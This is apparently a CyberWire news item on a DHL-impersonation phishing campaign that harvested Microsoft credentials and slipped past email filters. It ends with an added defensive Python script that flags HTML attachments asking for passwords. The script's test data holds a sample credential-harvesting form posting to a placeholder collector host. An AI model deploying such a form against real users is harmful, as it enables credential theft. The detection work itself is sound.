Credential phishing campaign impersonates DHL.
The CyberWire, Jan 17, 2023

A credential-harvesting campaign uses DHL impersonation for social engineering.

Armorblox describes a phishing campaign that uses phony shipping invoices purporting to come from DHL.

Attackers attempt to breach Microsoft accounts.

The campaign targeted an organization in the education industry with more than 100,000 emails:

“The body of the email continues to impersonate the well-known brand, through the inclusion of the company logo and brand colors and signature pertaining to the DLP customer service department. The email looks like a notification from DHL, notifying recipients about a parcel sent by a customer that needed to be rerouted to the correct delivery address. The body of the email has one simple call to action for the recipient, to view the attached document and confirm the destination address of the parcel shipment.”

The email contains an Excel document which, when opened, displays a blurred-out preview of an invoice. The user is asked to enter their Microsoft account login credentials in order to view the invoice.

Messages bypass security filters.

The researchers note that the emails were able to bypass email security filters since they didn’t contain any malicious links:

“The email attack used language as the main attack vector in order to bypass both Microsoft Office 365 and EOP email security controls. These native email security layers are able to block mass spam and phishing campaigns and known malware and bad URLs. However, this targeted email attack bypassed Microsoft email security because it did not include any bad URLs or links and included an HTML file that included a malicious phishing form.”
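Because the message body carries no links, a URL-reputation check has nothing to score; the credential form sits in the attachment. The following is an added example, not code from Armorblox or the original article: a minimal attachment check that flags HTML attachments containing a password field. The sample message, addresses, file name and form target are constructed for illustration.

```python
from email import message_from_bytes, policy
from email.message import EmailMessage
from html.parser import HTMLParser

class FormFinder(HTMLParser):
    """Collects <form> action targets and counts password inputs."""
    def __init__(self):
        super().__init__()
        self.form_actions = []
        self.password_inputs = 0

    def handle_starttag(self, tag, attrs):
        attrs = dict(attrs)
        if tag == "form":
            self.form_actions.append(attrs.get("action") or "")
        elif tag == "input" and (attrs.get("type") or "").lower() == "password":
            self.password_inputs += 1

def scan_message(raw_bytes):
    """Flag HTML attachments that ask for a password, even with no link in the body."""
    msg = message_from_bytes(raw_bytes, policy=policy.default)
    findings = []
    for part in msg.iter_attachments():
        name = part.get_filename() or ""
        is_html = (part.get_content_type() == "text/html"
                   or name.lower().endswith((".htm", ".html")))
        if not is_html:
            continue
        # Decode the transfer encoding (base64 / quoted-printable) before parsing.
        body = (part.get_payload(decode=True) or b"").decode("utf-8", "replace")
        finder = FormFinder()
        finder.feed(body)
        if finder.password_inputs:
            findings.append({"filename": name,
                             "password_inputs": finder.password_inputs,
                             "form_actions": finder.form_actions})
    return findings

def build_sample(attachment_html):
    """Constructed test message: link-free text body plus one HTML attachment."""
    msg = EmailMessage()
    msg["Subject"] = "Shipping document"
    msg.set_content("Please review the attached document to confirm the address.")
    msg.add_attachment(attachment_html, subtype="html", filename="invoice.html")
    return msg.as_bytes()

# Constructed attachment bodies (collector.example is a placeholder host).
SUSPECT_HTML = ('<form action="https://collector.example/submit" method="post">'
                '<input type="email" name="u"><input type="password" name="p"></form>')
BENIGN_HTML = "<html><body><p>Invoice total: 10.00</p></body></html>"
```

A password field in an attachment is a triage signal rather than a verdict; forms assembled by script at render time will not show up in a static parse like this one.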